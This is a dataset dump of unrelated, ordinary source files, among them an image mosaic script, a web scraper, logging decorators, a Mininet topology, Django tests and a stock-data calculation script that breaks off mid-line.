+{"seq_id":"168685654","text":"from PIL import Image\r\n\r\ndef main():\r\n    og_img = Image.open('lisa.jpg')#specify image to use\r\n    border = 50 #amount of small pictures that make up a side of the completed picture\r\n    fin_img = process(og_img, border)\r\n    \r\n    if input(\"Do you want to save completed picture?(y/n): \")[0].lower() == \"y\":\r\n        name, ext = og_img.filename.split(\".\")\r\n        fin_img.save(name+\"_edited.\"+ext)\r\n        print(\"Image saved\")\r\n    else:\r\n        fin_img.show()\r\n\r\n#makes a smaller version of the image and returns it\r\ndef smolify(image):\r\n    og_width = image.width\r\n    og_height = image.height\r\n\r\n    if og_width > og_height:\r\n        new_width = 50\r\n        new_height = int(new_width/og_width * og_height) \r\n    else:\r\n        new_height = 50\r\n        new_width = int(new_height/og_height * og_width)\r\n    \r\n    size = new_width,new_height\r\n    \r\n    return image.resize(size)\r\n\r\n#Averages each pixel of the image with the passed in RGB color\r\ndef tint(im, r, g, b):\r\n    source = im.split()\r\n    R, G, B = 0, 1, 2\r\n    outR = source[R].point(lambda i: (i+r)/2)\r\n    outG = source[G].point(lambda i: (i+g)/2)\r\n    outB = source[B].point(lambda i: (i+b)/2)\r\n    # build a new multiband image\r\n    im = Image.merge(\"RGB\", (outR,outG,outB))\r\n    return im\r\n\r\n#does the image processing\r\n#og_img is the image to be processed\r\n#border variable determines the amount of small pictures that make up one side of the completed picture\r\n#if mode is set to s then the finished image will automatically be saved\r\ndef process(og_img, border = 100, mode = None):\r\n    og_width = og_img.width\r\n    og_height = og_img.height\r\n    smol_img = smolify(og_img)\r\n    smol_width = smol_img.width\r\n    smol_height = smol_img.height\r\n    fin_img = Image.new(\"RGB\", (smol_width*border,smol_height*border))\r\n\r\n    #do image processing \r\n    for x in range(0, border):\r\n        for y in range(0, border):\r\n            print(\"Working...\")\r\n            pix_coord = (int(og_width/border*x), int(og_height/border*y))\r\n            pix = og_img.getpixel(pix_coord)\r\n            r, g, b = pix\r\n            tint_img = tint(smol_img, r, g, b)\r\n            coord = (smol_width*x, smol_height*y)\r\n            fin_img.paste(tint_img, coord)\r\n    \r\n    if mode == 's':\r\n        name, ext = og_img.filename.split(\".\")\r\n        fin_img.save(name+\"_edited.\"+ext)\r\n        print(\"Image saved\")\r\n\r\n    
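# hand the finished composite back to the caller\r\n    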
return fin_img\r\n    \r\nif __name__ == \"__main__\":\r\n    main()\r\n","sub_path":"speedwagon_project/image_processor.py","file_name":"image_processor.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"170615031","text":"import time\n\nimport requests\nfrom lxml import etree\nfrom concurrent.futures import ThreadPoolExecutor\n\n\ndef main():\n    start = time.time()\n    with ThreadPoolExecutor(20) as t:\n        for i in range(1, 29):\n            url = f\"https://learnku.com/laravel?page={i}\"\n            t.submit(save_info, url=url, page=i)\n    end = time.time()\n\n    print(f\"down---{end - start}\")\n    # html = get_html()\n    # # print(html)\n    # get_content(html)\n\n\ndef save_info(url, page):\n    get_content(get_html(url))\n    # print(f\"Page {page} finished crawling\")\n\n\ndef get_html(url):\n    headers = {\n        \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n                      \"Chrome/90.0.4430.212 Safari/537.36 \"\n    }\n    r = requests.get(url, headers=headers)\n    if r.status_code == 200:\n        return r.text\n    else:\n        print(f'Status code error: {r.status_code}')\n\n\ndef get_content(html):\n    tree = etree.HTML(html)\n    # total_page = tree.xpath('//ul[@class=\"pagination\"]/li[last()-1]/a/text()')[0]\n    # if not total_page:\n    #     print(\"Could not get the page count info\")\n    #     exit()\n    # spans = tree.xpath('//span[@class=\"topic-title\"]')\n    divs = tree.xpath('//div[@class=\"py-2 simple-topic\"]')\n\n    for i in divs:\n        title = i.xpath('./a/span[@class=\"topic-title\"]/text()')[0].strip()\n        link = i.xpath('./a/@href')[0]\n        if title:\n            print(title)\n            print(link)\n            print(\"=\" * 20)\n\n\n# with open('./files/laravel_info3.txt', 'a+', encoding='utf-8') as f:\n#     for i in spans:\n#         title = i.xpath('./text()')[0].strip()\n#         if title:\n#             f.write(title + '\\n')\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"src/laravel中文社区.py","file_name":"laravel中文社区.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"495656254","text":"# -*- coding: utf-8 -*-\n# @Time : 2017/6/27 14:29\n# @Author : simba\n\"\"\"\nAOP utility module\n\"\"\"\nimport datetime\nimport functools\nimport logging\nimport os\nimport sys\n\n_logger = logging.getLogger('simba.utils.aop_utils')\nlogging.basicConfig(\n    level=logging.INFO,\n    format='%(asctime)s %(name)-10s %(levelname)-5s %(message)s',\n    datefmt='%y-%m-%d %H:%M:%S',\n    # handlers=[RotatingFileHandler('aop.log', maxBytes=1024 * 1024 * 30, backupCount=50)]\n)\n\nseparater = os.sep\n\n\ndef log_before(func):\n    @functools.wraps(func)\n    def wrapper(*args, **kw):\n        file_name = sys._getframe().f_back.f_code.co_filename.split(separater)[-1]\n        code_line = sys._getframe().f_back.f_lineno\n        _logger.info(' %s(%s) begin execute %s with %s %s' % (\n            file_name, code_line, func.__name__, args,\n            kw))\n        return func(*args, **kw)\n\n    return wrapper\n\n\ndef log_after(func):\n    @functools.wraps(func)\n    def wrapper(*args, **kw):\n        file_name = sys._getframe().f_back.f_code.co_filename.split(separater)[-1]\n        code_line = sys._getframe().f_back.f_lineno\n        result = func(*args, **kw)\n        _logger.info(' %s(%s) successfully execute %s with %s %s, return %s' % (\n            file_name, code_line, func.__name__, args, kw, result))\n        return result\n\n    return wrapper\n\n\ndef log_around(func):\n    @functools.wraps(func)\n    def wrapper(*args, **kw):\n        file_name = sys._getframe().f_back.f_code.co_filename.split(separater)[-1]\n        code_line = sys._getframe().f_back.f_lineno\n        start_time = 
datetime.datetime.now()\n _logger.info(' %s(%s) begin execute %s at %s with %s %s' % (\n file_name, code_line, func.__name__, start_time, args, kw))\n\n result = func(*args, **kw)\n end_time = datetime.datetime.now()\n _logger.info(\n ' %s(%s) successfully execute %s at %s, return %s. use time: %s ' % (\n file_name, code_line, func.__name__, end_time, result, end_time - start_time))\n return result\n\n return wrapper\n\n\nif __name__ == '__main__':\n @log_around\n def add():\n sum = 0\n for i in range(10000000):\n sum += i\n return sum\n\n\n print(add())\n","sub_path":"simba/utils/aop_utils.py","file_name":"aop_utils.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"523244501","text":"\"\"\"Storage module with settings for argparse and logging\"\"\"\n\nimport logging\nimport sys\nfrom enum import Enum\nfrom pathlib import Path\n\nimport argparse\n\n\nclass AppConstant(Enum):\n \"\"\"Class immutable values\"\"\"\n ACTUAL_VERSION = 'Version 4.1.0'\n\n\nclass AppArgParser:\n \"\"\"Class for initializing arguments for working with CLI\"\"\"\n\n def __init__(self):\n self.parser = argparse.ArgumentParser(description='Pure Python command-line RSS reader.')\n self.parser.add_argument('--version', action=\"version\", version=AppConstant.ACTUAL_VERSION.value,\n help='Print version info')\n self.parser.add_argument('--json', action='store_true', help='Print result as JSON in stdout')\n self.parser.add_argument('--verbose', action=\"store_true\", help='Outputs verbose status messages')\n self.parser.add_argument('--limit', type=int, default=None, help='Limit news topics if this parameter provided')\n self.parser.add_argument('source', nargs=\"?\", default=None, help='URL RSS')\n self.parser.add_argument('--date', type=int, default=None,\n help='Print news published on a specific date from cache')\n self.parser.add_argument('--to-html', type=str, nargs=\"?\", metavar=\"PATH\",\n help=\"Convert news to HTML format and save them by the specified folder path\")\n self.parser.add_argument('--to-pdf', type=str, nargs=\"?\", metavar=\"PATH\",\n help=\"Convert news to PDF format and save them by the specified folder path\")\n\n def get_args(self) -> argparse.Namespace:\n \"\"\"\n Initialization of arguments\n :return: object storing attributes\n \"\"\"\n return self.parser.parse_args()\n\n\nclass AppLogger:\n \"\"\"Class for initialization and setup logger and handlers\"\"\"\n\n FORMAT = '%(asctime)s - %(name)s:%(lineno)s - %(levelname)s - %(message)s'\n\n @staticmethod\n def init_logger(name):\n \"\"\"Initialization and setup root logger. 
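Writes DEBUG and above to logs/grebarss_logs.log next to this module. 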
Setup and start file handler\"\"\"\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n\n current_dir = Path(__file__).parent.resolve()\n file_path = Path(current_dir, 'logs/grebarss_logs.log')\n\n fh = logging.FileHandler(filename=file_path, mode='w', encoding='utf-8')\n fh.setFormatter(logging.Formatter(AppLogger.FORMAT))\n fh.setLevel(logging.DEBUG)\n logger.addHandler(fh)\n\n @staticmethod\n def activate_verbose():\n \"\"\"Setup and start stream handler for verbose mode\"\"\"\n logger = logging.getLogger('app')\n sh = logging.StreamHandler(stream=sys.stdout)\n sh.setFormatter(logging.Formatter(AppLogger.FORMAT))\n sh.setLevel(logging.INFO)\n logger.addHandler(sh)\n","sub_path":"AlexanderHreben/grebarss_reader/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"138475728","text":"from dataclasses import dataclass\n\n\n@dataclass(frozen=True)\nclass SongCodec:\n \"\"\"\n Represents a sound codec\n \"\"\"\n mime_type: str\n extension: str\n\n\nMP4 = SongCodec(\"video/mp4\", 'mp4')\nMP4_AUDIO = SongCodec(\"audio/mp4\", 'm4a')\n\nCODECS = [MP4, MP4_AUDIO]\n","sub_path":"core/song_codecs.py","file_name":"song_codecs.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"144773008","text":"#coding=utf-8\n__author__ = 'AllenCHM'\nimport sys\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nimport os\n\ndef download_package(package_url):\n print(\"start download_build_result\")\n if not package_url.endswith(\"/\"):\n package_url += '/'\n cmd = \"wget -c -r -nd -np -P %s %s\" % (\"output\", package_url)\n print(cmd)\n os.system(cmd)\n print(os.getcwd())\n print(\"finish download_build_result\")","sub_path":"网络/Python根据url下载目录或者文件.py","file_name":"Python根据url下载目录或者文件.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"344822716","text":"# binary search, time O(log(n)), space O(1)\nclass Solution(object):\n def nextGreatestLetter(self, letters, target):\n \"\"\"\n :type letters: List[str]\n :type target: str\n :rtype: str\n \"\"\"\n if not letters or not ('a' <= target <= 'z') \\\n or (letters[0] == letters[-1] == target):\n return \"\"\n if letters[-1] <= target:\n return letters[0]\n \n left, right = 0, len(letters)-1\n while left + 1 < right:\n mid = left + (right-left)//2\n if letters[mid] > target:\n right = mid\n else:\n left = mid\n if letters[left] > target:\n return letters[left]\n elif letters[right] > target:\n return letters[right]\n else:\n return letters[0]\n \n\n\n\n# time O(n), space O(1)\nclass Solution1(object):\n def nextGreatestLetter(self, letters, target):\n \"\"\"\n :type letters: List[str]\n :type target: str\n :rtype: str\n \"\"\"\n if not letters or not ('a' <= target <= 'z'):\n return \"\"\n res = float('inf')\n for c in letters:\n num = (26 + ord(c) - ord(target))%26 # shift all letters so that target is set to 0\n if num > 0:\n res = min(res, num)\n code = res + ord(target)\n if code > ord('z'):\n code -= 26\n return chr(code)\n\n\n\"\"\"\nGiven a list of sorted characters letters containing only lowercase letters, and given a target letter target, find the smallest element in the list that is larger than the given target.\n\nLetters also wrap around. 
For example, if the target is target = 'z' and letters = ['a', 'b'], the answer is 'a'.\n\nExamples:\nInput:\nletters = [\"c\", \"f\", \"j\"]\ntarget = \"a\"\nOutput: \"c\"\n\nInput:\nletters = [\"c\", \"f\", \"j\"]\ntarget = \"c\"\nOutput: \"f\"\n\nInput:\nletters = [\"c\", \"f\", \"j\"]\ntarget = \"d\"\nOutput: \"f\"\n\nInput:\nletters = [\"c\", \"f\", \"j\"]\ntarget = \"g\"\nOutput: \"j\"\n\nInput:\nletters = [\"c\", \"f\", \"j\"]\ntarget = \"j\"\nOutput: \"c\"\n\nInput:\nletters = [\"c\", \"f\", \"j\"]\ntarget = \"k\"\nOutput: \"c\"\nNote:\nletters has a length in range [2, 10000].\nletters consists of lowercase letters, and contains at least 2 unique letters.\ntarget is a lowercase letter.\n\"\"\"\n","sub_path":"0744. Find Smallest Letter Greater Than Target.py","file_name":"0744. Find Smallest Letter Greater Than Target.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"97860248","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\n\nimport fsquery\nimport mvtools_exception\nimport terminal_colors\n\nimport git_push\nimport git_lib\nimport path_utils\n\ndef filter_sub_files(sub_candidates):\n\n ret = []\n for i in sub_candidates:\n if path_utils.basename_filtered(i) == \".git\":\n ret.append(path_utils.dirname_filtered(i))\n\n return ret\n\ndef push_subs(path):\n\n v, r = fsquery.makecontentlist(path, True, False, False, False, True, False, True, None)\n if not v:\n raise mvtools_exception.mvtools_exception(r)\n subs = filter_sub_files(r)\n\n report = []\n anyfailed = False\n\n for s in subs:\n\n v, r = git_lib.get_remotes(s)\n if not v:\n anyfailed = True\n report.append(\"push_subs failed [%s]: [%s]\" % (s, r))\n continue\n rs = r\n v, r = git_lib.get_branches(s)\n if not v:\n anyfailed = True\n report.append(\"push_subs failed [%s]: [%s]\" % (s, r))\n continue\n bs = r\n\n af, r = git_push.do_push(s, rs, bs)\n anyfailed |= af\n report += r\n\n print(os.linesep)\n for rp in report:\n print(rp)\n print(os.linesep)\n\n if anyfailed:\n print(\"%sErrors detected, see above.%s\" % (terminal_colors.TTY_RED, terminal_colors.TTY_WHITE))\n else:\n print(\"%sAll succeeded.%s\" % (terminal_colors.TTY_GREEN, terminal_colors.TTY_WHITE))\n\nif __name__ == \"__main__\":\n\n path = \"\"\n if len(sys.argv) > 1:\n path = sys.argv[1]\n else:\n path = os.getcwd()\n\n push_subs(path)\n","sub_path":"git/visitor/git_sub_push.py","file_name":"git_sub_push.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"51335561","text":"#!/usr/bin/python\n\nfrom mininet.topo import Topo\n# from mininet.link import TCLink\n\nclass MyTopo(Topo):\n\tdef __init__(self):\n\n\t\tTopo.__init__(self)\n\n\t\thost1 = self.addHost('h1', mac='00:00:00:00:00:01', ip='10.0.0.1')\n\t\thost2 = self.addHost('h2', mac='00:00:00:00:00:02', ip='10.0.0.2')\n\n\t\tswitch1 = self.addSwitch('s1')\n\t\tswitch2 = self.addSwitch('s2')\n\n\t\tself.addLink(switch2, host2)\n\t\tself.addLink(switch1, host1)\n\t\tself.addLink(switch1, switch2)\n\ntopos = {'mytopo': (lambda: MyTopo() )}\n","sub_path":"mininet-scripts/tipo-experimental.py","file_name":"tipo-experimental.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"330173688","text":"from tkinter import *\nimport webbrowser\nwindow=Tk()\nwindow.geometry(\"300x200\")\nwindow.title(\"COLT BKMT\")\n\nnew = 
1\nurl = \"https://coltnyc.tumblr.com/\"\n\nnew = 2\nurl2 = \"https://www.youtube.com/watch?v=aUYt0UYYFJQ\"\n\nmyname = \"Colt Montana\"\nmymail = \"cwmcphail90@gmail.com\"\n\n\n\ndef full_name():\n print(myname)\n print(mymail)\n\n\ndef openweb():\n webbrowser.open(url,new=new)\n\ndef openweb2():\n webbrowser.open(url2,new=new)\n\ndef myClick():\n myLabel = Label(window, text=\"Colt Montana \\n cwmcphail@gmail.com\")\n myLabel.pack()\n\n \nlabel1 = Label(window, text=\"The Official App of Colt Montana\", fg=\"black\", bg=\"red\", relief=\"solid\", font= (\"arial\", 18, \"bold\")).pack()\n\nBtn = Button(text = \"Music\", padx=10, pady=5, command=openweb)\nBtn.pack()\n\nbutton3 = Button(text=\"Country Boy Mile High Video\", padx=10, pady=5, command=openweb2)\nbutton3.pack()\n\n\nmyButton = Button(window, text=\"Info\", padx=10, pady=5, command=myClick)\nmyButton.pack()\n\nquit_button = Button(window, text=\"Quit\", padx=10, pady=5, command=quit)\nquit_button.pack()\n\nwindow.mainloop()","sub_path":"colt_app.py","file_name":"colt_app.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"205909207","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.1 (3151)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/dust/services/dustmail/reader.py\n# Compiled at: 2010-06-01 14:15:46\nimport os, sys, time, glob\nfrom dust.crypto.curve import Key\nfrom dust.crypto.keys import KeyManager\nfrom dust.core.util import getPublicIP, encode, decode\nfrom dust.core.data_packet import DataPacket\nfrom dust.util.ymap import YamlMap\npasswd = sys.argv[1]\nkeys = KeyManager()\nkeys.setInvitePassword(passwd)\nkeys.loadKnownHosts('config/knownhosts.yaml')\nkeys.loadKeypair('config/id.yaml')\nkeys.loadIncomingInvites('config/incoming_invites.ip')\nkeys.loadOutgoingInvites('config/outgoing_invites.ip')\nkeypair = keys.getKeypair()\npubkey = keypair.public\npubkeyhex = encode(pubkey.bytes)\nprint('pubkey: ' + pubkeyhex)\nmaildir = 'spool/' + pubkeyhex\naddressBook = YamlMap('config/dustmail-addressbook.yaml')\n\ndef displayList():\n msgs = []\n for file in glob.glob(maildir + '/*.*'):\n stats = os.stat(file)\n lastmod_date = time.localtime(stats[8])\n date_file_tuple = (lastmod_date, file)\n msgs.append(date_file_tuple)\n\n msgs.sort()\n msgs.reverse()\n for x in range(len(msgs)):\n date, fname = msgs[x]\n frm = fname.split('/')[(-1)].split('-')[0]\n modtime = time.strftime('%m/%d/%Y %I:%M%p', date)\n try:\n frm = addressBook[frm]\n except:\n pass\n\n print(str(x + 1) + ': ' + frm + ' ' + modtime)\n\n return msgs\n\n\ndef displayMessage(fname):\n f = open(fname, 'r')\n msg = f.read()\n f.close()\n destpubkey = Key(decode(fname.split('/')[(-1)].split('-')[0]), False)\n sessionKey = keypair.createSession(destpubkey)\n data = decode(msg)\n packet = DataPacket()\n packet.decodeDataPacket(sessionKey.bytes, data)\n print(packet.data.decode('ascii'))\n\n\ndef parseCommand(command):\n if command == 'x':\n sys.exit(0)\n\n\nmsgs = displayList()\ncommand = None\nwhile input != 'x':\n command = input('> ').strip()\n try:\n num = int(command)\n except:\n if command == 'l':\n msgs = displayList()\n else:\n parseCommand(command)\n\n displayMessage(msgs[(num - 
1)][1])","sub_path":"pycfiles/Dust-0.1a7-py3.1/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"392609386","text":"from datetime import datetime\nfrom functools import wraps\n\nfrom memorious.core import session\nfrom memorious.model.event import Event\nfrom memorious.model.operation import Operation\n\n\ndef operation():\n \"\"\"Wrap a method on a crawler to track the outcome of its execution.\"\"\"\n def op_decorator(func):\n\n @wraps(func)\n def func_wrapper(context, data, *a, **kw):\n op = Operation()\n op.crawler = context.crawler.name\n op.name = context.stage.name\n op.run_id = context.run_id\n op.status = Operation.STATUS_PENDING\n session.add(op)\n session.commit()\n\n context.operation_id = op.id\n\n try:\n context.log.info('Running: %s', op.name)\n res = func(context, data, *a, **kw)\n op.status = Operation.STATUS_SUCCESS\n return res\n except Exception as exc:\n # this should clear results and tags created by this op\n session.rollback()\n Event.save(op.id, Event.LEVEL_ERROR, exc=exc)\n context.log.exception(exc)\n finally:\n if op.status == Operation.STATUS_PENDING:\n op.status = Operation.STATUS_FAILED\n op.ended_at = datetime.utcnow()\n session.add(op)\n session.commit()\n\n return func_wrapper\n return op_decorator\n","sub_path":"memorious/logic/operation.py","file_name":"operation.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"456010796","text":"from flask import Flask, render_template, request, session, g, redirect, url_for, abort, flash\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\n# Set up for flask\nDEBUG = True\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n# set up for gspread\nscope = ['https://spreadsheets.google.com/feeds']\ncredentials = ServiceAccountCredentials.from_json_keyfile_name('creds.json', scope)\ngc = gspread.authorize(credentials)\n\n@app.route('/')\ndef hello_world():\n sh = gc.open(\"Charged Question Responses\")\n worksheet = sh.get_worksheet(0)\n responses = worksheet.get_all_values()\n responses = responses[1:]\n responses = [dict(time=row[0], text=row[1], name=row[2]) for row in responses]\n responses = responses[::-1]\n return render_template('show_responses.html', responses=responses)\n\n@app.route('/form')\ndef show_form():\n return render_template('form.html')\n\nif __name__ == '__main__':\n app.run()","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"130259403","text":"import pytest\nfrom django.http import QueryDict\n\nfrom django.urls import reverse\n\nfrom core import helpers\nfrom core.helpers import SortFilter, sort_opportunities, ScaleFilter, \\\n filter_opportunities, RegionFilter, SectorFilter, SubSectorFilter\n\n\n@pytest.mark.parametrize('path,expect_code', (\n ('/', None),\n ('?language=pt', 'pt'),\n ('/industries?language=es', 'es'),\n ('/industries/?language=zh-hans', 'zh-hans'),\n ('/industries/aerospace?language=de', 'de'),\n ('/industries/automotive/?language=fr', 'fr'),\n ('?lang=fr', 'fr'),\n ('?language=de&lang=de', 'de'),\n ('?lang=pt&language=es', 'es')\n))\ndef test_get_language_from_querystring(path, expect_code, rf):\n url = reverse('index')\n request = rf.get(url + path)\n language_code = 
helpers.get_language_from_querystring(request)\n assert language_code == expect_code\n\n\nunslugify_slugs = [\n ('test-slug-one', 'Test slug one'),\n ('test-two', 'Test two'),\n ('slug', 'Slug'),\n]\n\n\n@pytest.mark.parametrize('slug,exp', unslugify_slugs)\ndef test_unslugify(slug, exp):\n assert helpers.unslugify(slug) == exp\n\n\ndef test_get_paginator_url():\n filters = QueryDict('')\n\n assert helpers.get_paginator_url(filters, 'opportunities') == (\n reverse('opportunities') + '?'\n )\n\n\ndef test_get_paginator_url_with_filters():\n filters = QueryDict('sector=Energy§or=Aerospace&scale=Value+unknown')\n\n assert helpers.get_paginator_url(filters, 'opportunities') == (\n reverse('opportunities') + '?sector=Energy§or=Aerospace&scale=Value+unknown' # NOQA\n )\n\n\ndef test_get_paginator_url_with_spaces_filters():\n filters = QueryDict('sector=A+value+with+spaces+')\n\n assert helpers.get_paginator_url(filters, 'opportunities') == (\n reverse('opportunities') + '?sector=A+value+with+spaces+'\n )\n\n\ndef test_sort_opportunities_scale():\n\n opportunities = [\n {\n 'scale_value': 100\n },\n {\n 'scale_value': 3\n },\n {\n 'scale_value': 30\n }\n ]\n\n sorting_chosen = SortFilter('Scale: High to Low')\n\n sorted_opps = sort_opportunities(opportunities, sorting_chosen)\n\n assert sorted_opps[0]['scale_value'] == 100\n assert sorted_opps[1]['scale_value'] == 30\n assert sorted_opps[2]['scale_value'] == 3\n\n\ndef test_sort_opportunities_name():\n\n opportunities = [\n {\n 'title': 'Ashton Green'\n },\n {\n 'title': 'Zoology'\n },\n {\n 'title': 'Birmingham Curzon'\n },\n ]\n\n sorting_chosen = SortFilter('Project name: A to Z')\n\n sorted_opps = sort_opportunities(opportunities, sorting_chosen)\n\n assert sorted_opps[0]['title'] == 'Ashton Green'\n assert sorted_opps[1]['title'] == 'Birmingham Curzon'\n assert sorted_opps[2]['title'] == 'Zoology'\n\n\ndef test_filter_opportunities_scale():\n opportunities = [\n {\n 'scale_value': 100\n },\n {\n 'scale_value': 3\n },\n {\n 'scale_value': 30\n },\n {\n 'scale_value': 3000\n }\n ]\n\n filter_chosen = ScaleFilter('< £100m')\n\n filtered_opps = filter_opportunities(opportunities, filter_chosen)\n assert len(filtered_opps) == 2\n\n\ndef test_filter_opportunities_sub_sector():\n opportunities = [\n {\n 'sub_sectors': ['Energy', 'Housing'],\n },\n {\n 'sub_sectors': ['Mixed-use', 'Housing'],\n },\n {\n 'sub_sectors': ['Energy', 'Mixed-use'],\n },\n ]\n\n filter_chosen = SubSectorFilter('Housing')\n\n filtered_opps = filter_opportunities(opportunities, filter_chosen)\n assert len(filtered_opps) == 2\n\n\ndef test_filter_opportunities_scale_value_unknown():\n opportunities = [\n {\n 'scale_value': 100\n },\n {\n 'scale_value': 1\n },\n {\n 'scale_value': '0.00'\n },\n {\n 'scale_value': 0.0\n },\n {\n 'scale_value': '0'\n },\n {\n 'scale_value': ''\n }\n ]\n\n filter_chosen = ScaleFilter('Value unknown')\n\n filtered_opps = filter_opportunities(opportunities, filter_chosen)\n assert len(filtered_opps) == 4\n\n\ndef test_filter_opportunities_scale_greater_than_1000():\n opportunities = [\n {\n 'scale_value': 100\n },\n {\n 'scale_value': 1\n },\n {\n 'scale_value': 0\n },\n {\n 'scale_value': 3000\n }\n ]\n\n filter_chosen = ScaleFilter('> £1bn')\n\n filtered_opps = filter_opportunities(opportunities, filter_chosen)\n assert len(filtered_opps) == 1\n\n\ndef test_filter_opportunities_region():\n opportunities = [\n {'related_region': {'title': 'Midlands'}},\n {'related_region': ''},\n {'related_region': {'title': 'Midlands'}},\n {'related_region': 
{'title': ''}},\n ]\n\n filter_chosen = RegionFilter('Midlands')\n\n filtered_opps = filter_opportunities(opportunities, filter_chosen)\n assert len(filtered_opps) == 2\n\n\ndef test_filter_opportunities_sector():\n opportunities = [\n {\n 'related_sectors': [\n {'related_sector': {'heading': 'Aston Green'}},\n {'related_sector': {'heading': 'Birmingham Curzon'}},\n ],\n },\n {\n 'related_sectors': [\n {'related_sector': {'heading': 'Aston Green'}},\n ],\n },\n ]\n\n filter_chosen = SectorFilter('Birmingham Curzon')\n\n filtered_opps = filter_opportunities(opportunities, filter_chosen)\n assert len(filtered_opps) == 1\n\n\ndef test_filter_opportunities_multiple_filters():\n opportunities = [\n {\n 'title': 'this one',\n 'related_sectors': [\n {'related_sector': ''},\n {'related_sector': {'heading': 'Birmingham Curzon'}},\n {'related_sector': {'heading': ''}},\n ],\n 'scale_value': 0,\n 'related_region': {'title': 'Midlands'},\n\n },\n {\n 'title': 'not this one',\n 'related_sectors': [\n {'related_sector': {'heading': 'Aston Green'}},\n ],\n 'scale_value': 3000,\n 'related_region': {'title': ''},\n },\n ]\n\n filtered_opps = filter_opportunities(opportunities, SectorFilter(\n 'Birmingham Curzon'\n ))\n filtered_opps = filter_opportunities(filtered_opps, RegionFilter(\n 'Midlands'\n ))\n filtered_opps = filter_opportunities(filtered_opps, ScaleFilter(\n 'Value unknown'\n ))\n assert len(filtered_opps) == 1\n assert filtered_opps[0]['title'] == 'this one'\n","sub_path":"core/tests/test_helpers.py","file_name":"test_helpers.py","file_ext":"py","file_size_in_byte":6731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"154736839","text":"from urllib2 import urlopen,Request\nimport json\nimport MySQLdb\nimport time\nimport os\nimport ts\n\ndef run():\n\tfile=\"/root/futu/log/daily_month_profit_calc.%d.log\" % (ts.ts())\n\tif not os.path.exists(file):\n\t\tos.system('touch %s' % file)\n\tlog=open(file,'a')\n\tlog.write(\"%f daily_calc_ma start\\n\" %(time.time()))\n\n\tconn= MySQLdb.connect(\n\t\t\thost='localhost',\n\t\t\tport = 3306,\n\t\t\tuser='root',\n\t\t\tpasswd='root',\n\t\t\tdb ='db_stock',\n\t\t\t)\n\tcur = conn.cursor()\n\tcur.execute('select * from t_stock_futu')\n\tresults = cur.fetchall()\n\n\t# get stock\n\tstocks = []\n\tfor row in results:\n\t\tstock = {'id':row[0],'se':row[1],'name':row[2],'sid':row[3]}\n\t\tstocks.append(stock)\n\t\n\t# stocks = []\n\t# stocks.append({'id':'00700'})\n\n\tcurr_mts = ts.month_ts()\n\tinsert_sql_num = 0\n\tstocks_num = 0\n\tfor stock in stocks:\n\t\tstocks_num += 1\n\t\tstock_id\t= stock['id']\n\n\t\tstock_max_ts = 0 \n\t\tmax_ts_query = \"select max(month_ts) from t_stock_month_profit_hk where stock_id='%s'\" % (stock_id)\n\t\tcur.execute(max_ts_query)\n\t\tresults = cur.fetchall()\n\t\tfor row in results:\n\t\t\tif row[0] != None:\n\t\t\t\tstock_max_ts = row[0]\n\n\t\ttarget_mts = ts.last_month_ts(curr_mts) # calc from last month\n\t\twhile target_mts > stock_max_ts:\n\t\t\tlast_mts = ts.last_month_ts(target_mts)\n\t\t\tget_month_data_query = \"select * from t_stock_history where stock_id='%s' and stock_day_ts < %d and stock_day_ts >= %d order by stock_day_ts desc\" \\\n\t\t\t\t\t\t\t\t%(stock_id,target_mts,last_mts)\n\t\t\t# print(get_month_data_query)\n\t\t\tcur.execute(get_month_data_query)\n\t\t\tresults = cur.fetchall()\n\t\t\tif len(results)<=0:\n\t\t\t\tprint('break at ts=%s for stock=%s' %(ts.htime(last_mts),stock_id))\n\t\t\t\tbreak\n\t\t\t# print('get stock[%s] data %d at ts=%s' 
